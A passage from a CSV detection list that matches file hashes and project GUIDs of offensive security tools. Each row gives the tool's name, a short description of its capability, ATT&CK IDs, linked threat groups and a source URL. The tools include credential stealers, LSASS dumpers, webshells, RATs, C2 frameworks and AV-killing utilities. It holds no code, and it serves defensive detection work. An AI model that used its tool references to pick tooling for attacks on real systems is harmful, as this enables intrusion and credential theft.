fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24171" "*30444d3f4f3bedc5d6aac36ad4deb9ce32d2ac91eb0b30e590f702b06825f372*",".{0,1000}30444d3f4f3bedc5d6aac36ad4deb9ce32d2ac91eb0b30e590f702b06825f372.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#filehash","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","24172" "*304900fc65b3540b7ae14e9c8813311caea7b57d1ce54b7c519adefee9a60e9f*",".{0,1000}304900fc65b3540b7ae14e9c8813311caea7b57d1ce54b7c519adefee9a60e9f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24173" "*304a4ce184f84b3d8e138e8c070cc82854c637559bc2c4a0e6d59fa94fdfa10d*",".{0,1000}304a4ce184f84b3d8e138e8c070cc82854c637559bc2c4a0e6d59fa94fdfa10d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24174" "*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*",".{0,1000}304D5A8A\-EF98\-4E21\-8F4D\-91E66E0BECAC.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24175" "*305f49e1b101e3a479f9da65f7852ad4aa2870198d9491b0166abfe07ae2a95c*",".{0,1000}305f49e1b101e3a479f9da65f7852ad4aa2870198d9491b0166abfe07ae2a95c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24177" "*30614c74a863ad156d72f5f00405a87ad098b59fc6e45eaaa1f78cab7222c29c*",".{0,1000}30614c74a863ad156d72f5f00405a87ad098b59fc6e45eaaa1f78cab7222c29c.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","24179" "*3063cb48a6a184bcc77efdf9c5753b7ffc1c4e5a4f5d10619b7741d1d1789a40*",".{0,1000}3063cb48a6a184bcc77efdf9c5753b7ffc1c4e5a4f5d10619b7741d1d1789a40.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24180" "*307088B9-2992-4DE7-A57D-9E657B1CE546*",".{0,1000}307088B9\-2992\-4DE7\-A57D\-9E657B1CE546.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#GUIDproject","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","24182" "*307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62*",".{0,1000}307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24185" "*307925f20e73a5b32e5a5b260398f3b838f9966c1dc4e7913d3036fbb52d4508*",".{0,1000}307925f20e73a5b32e5a5b260398f3b838f9966c1dc4e7913d3036fbb52d4508.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - 
T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24186" "*307e2e6e52992a452f593a7a0c3c04753717949c11b0d43fbd47d44ddb6854d4*",".{0,1000}307e2e6e52992a452f593a7a0c3c04753717949c11b0d43fbd47d44ddb6854d4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24187" "*307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59*",".{0,1000}307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","24188" "*30859c25f2d9763bf4a8416c82d125bb11168e48f0527ee36741977bee0354ac*",".{0,1000}30859c25f2d9763bf4a8416c82d125bb11168e48f0527ee36741977bee0354ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24190" "*30939d4bfbff459b8de9419897dbd48b10032790935f175c39796cbb605651fd*",".{0,1000}30939d4bfbff459b8de9419897dbd48b10032790935f175c39796cbb605651fd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24194" "*30953a500fc7c834d7796b370c290d978e11a090dc28a62e5753467f1d00da7c*",".{0,1000}30953a500fc7c834d7796b370c290d978e11a090dc28a62e5753467f1d00da7c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24195" "*30995a0eee6dda0cef60b94e666eae8ba42efd818217e7fcf798e8bc8d1e1e17*",".{0,1000}30995a0eee6dda0cef60b94e666eae8ba42efd818217e7fcf798e8bc8d1e1e17.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24196" "*309a7793f785eec671771cbf3bdb33f17cfd71702d0bfc482f6780c8aaa66876*",".{0,1000}309a7793f785eec671771cbf3bdb33f17cfd71702d0bfc482f6780c8aaa66876.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24198" "*309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94*",".{0,1000}309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command 
and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","24199" "*30a4f702dd51a4c04de7f62966622a6a85a77c77f5587e880a2d46b8e93325e5*",".{0,1000}30a4f702dd51a4c04de7f62966622a6a85a77c77f5587e880a2d46b8e93325e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24200" "*30a7e68f32b0c23d57cba6941e7f990fa147e47facb387085b26e3a16c37f0df*",".{0,1000}30a7e68f32b0c23d57cba6941e7f990fa147e47facb387085b26e3a16c37f0df.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","24201" "*30ae46c2d4af520064374b822bdbc1bbce8dfb67a1280dc6b4461c67aa3289f0*",".{0,1000}30ae46c2d4af520064374b822bdbc1bbce8dfb67a1280dc6b4461c67aa3289f0.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","24202" "*30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454*",".{0,1000}30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24203" "*30B8883F-A0A2-4256-ADCF-A790525D3696*",".{0,1000}30B8883F\-A0A2\-4256\-ADCF\-A790525D3696.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24205" "*30be4c2b3d3ce434211fc4f788fff62849baecdb847b41b554da47f7c2c7b284*",".{0,1000}30be4c2b3d3ce434211fc4f788fff62849baecdb847b41b554da47f7c2c7b284.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24206" "*30c5d870db5787b40d4ccd8e311a03805aed56149d5f183f0d29c51643053782*",".{0,1000}30c5d870db5787b40d4ccd8e311a03805aed56149d5f183f0d29c51643053782.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24208" "*30ca8fd888d811b831b16e08c4c3d7cd5c403d2a3beca111b7f9587fe4ceb17c*",".{0,1000}30ca8fd888d811b831b16e08c4c3d7cd5c403d2a3beca111b7f9587fe4ceb17c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24209" "*30cb4b65148413d62c04a83891b7dda36fb70d4699d02a5758e9122a833b8e73*",".{0,1000}30cb4b65148413d62c04a83891b7dda36fb70d4699d02a5758e9122a833b8e73.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","24210" "*30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca*",".{0,1000}30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24211" "*30D66EE9B5168E6E03F7E57F4A0CEA711CCC8BB69F911E143626F50DAA67D660*",".{0,1000}30D66EE9B5168E6E03F7E57F4A0CEA711CCC8BB69F911E143626F50DAA67D660.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24212" "*30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6*",".{0,1000}30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24213" "*30d8c28dd9f77268fd3fac0b3cb666886623e99bb681c6484d8cd1dd995cd606*",".{0,1000}30d8c28dd9f77268fd3fac0b3cb666886623e99bb681c6484d8cd1dd995cd606.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24214" "*30e270d972931c04fef43bb97b99a1d2f83cb87e26c65d2deb8c6e2fe4854630*",".{0,1000}30e270d972931c04fef43bb97b99a1d2f83cb87e26c65d2deb8c6e2fe4854630.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","24217" "*30e59e027270c23d6ffe6b89e2f149d5da63533e07e8f365fee9704dd722f002*",".{0,1000}30e59e027270c23d6ffe6b89e2f149d5da63533e07e8f365fee9704dd722f002.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24218" 
"*30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0*",".{0,1000}30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24219" "*30e7fd50bce6e345e3a83a1ead175bccb2b388b0b95bd11b36095a8928fb796c*",".{0,1000}30e7fd50bce6e345e3a83a1ead175bccb2b388b0b95bd11b36095a8928fb796c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24220" "*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*",".{0,1000}30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","24221" "*30fb8b27a7636a8922aff3018b2b612bf224a17bf7a9c9f2f2a01d4f7754c522*",".{0,1000}30fb8b27a7636a8922aff3018b2b612bf224a17bf7a9c9f2f2a01d4f7754c522.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#filehash","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","24222" "*310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7*",".{0,1000}310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24227" "*310FC5BE-6F5E-479C-A246-6093A39296C0*",".{0,1000}310FC5BE\-6F5E\-479C\-A246\-6093A39296C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","24229" "*31108a00a2c2016b0fb4d0e39fb2dbdce141ce9accf9ca0b2cbc47ab2f377cb8*",".{0,1000}31108a00a2c2016b0fb4d0e39fb2dbdce141ce9accf9ca0b2cbc47ab2f377cb8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24230" "*31113cca78db9828b1fb6c8f39cd227129049a64dc645fc6fa12cc9aec4eec56*",".{0,1000}31113cca78db9828b1fb6c8f39cd227129049a64dc645fc6fa12cc9aec4eec56.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","24231" "*3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0*",".{0,1000}3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24232" "*31218c2e08ddf852de490f4d48d3d5751c3bc66ae9a73c815421dd20cd6b748e*",".{0,1000}31218c2e08ddf852de490f4d48d3d5751c3bc66ae9a73c815421dd20cd6b748e.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","24234" "*312a47c833f5ea3eb3e1f8f3a26c9bbc811a1a4b389c432715ea8f040826f65f*",".{0,1000}312a47c833f5ea3eb3e1f8f3a26c9bbc811a1a4b389c432715ea8f040826f65f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24235" "*3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d*",".{0,1000}3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - 
